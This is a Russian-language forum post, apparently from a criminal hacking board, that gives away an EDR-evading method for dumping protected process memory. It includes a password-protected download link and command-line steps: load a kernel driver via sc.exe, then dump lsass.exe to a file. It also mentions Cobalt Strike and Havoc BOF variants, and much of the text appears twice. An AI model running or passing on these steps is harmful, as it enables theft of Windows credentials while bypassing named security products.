Отдаю бесплатно метод дампа любого защищенного процесса, по крайней мере это было актуально год-полтора назад, Сентинел, Софос, Каспер, Крауд обходил без проблем не смотря на MiniDumpWriteDump, сейчас не знаю, давно не пользовались. (Убрано все лишнее из исходников)
Так же где то был BOF под кобу и хавк. Если найду то скину сюда. При сильном желании адтоптировать в BOF из исходников не составит труда.
Pass: местный
send.exploit.in
Запуск от админа:
sc.exe create навзание binPath= "путь к драйверу" type= kernel
sc.exe start название
dmp.exe lsass.exe C:\tmp.bin
P.S Название темы байт, что б набрать классы. И отсылка к местному индусу продавану паблика по оверпрайсу (он это тоже пытался продавать под видом супер приваДного зиродэя).
Так же где то был BOF под кобу и хавк. Если найду то скину сюда. При сильном желании адтоптировать в BOF из исходников не составит труда.
У вас должно быть более 10 сообщений для просмотра скрытого контента.
У вас должно быть более 10 реакций для просмотра скрытого контента.
Pass: местный
Exploit.IN Send
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
Запуск от админа:
sc.exe create навзание binPath= "путь к драйверу" type= kernel
sc.exe start название
dmp.exe lsass.exe C:\tmp.bin
P.S Название темы байт, что б набрать классы. И отсылка к местному индусу продавану паблика по оверпрайсу (он это тоже пытался продавать под видом супер приваДного зиродэя).

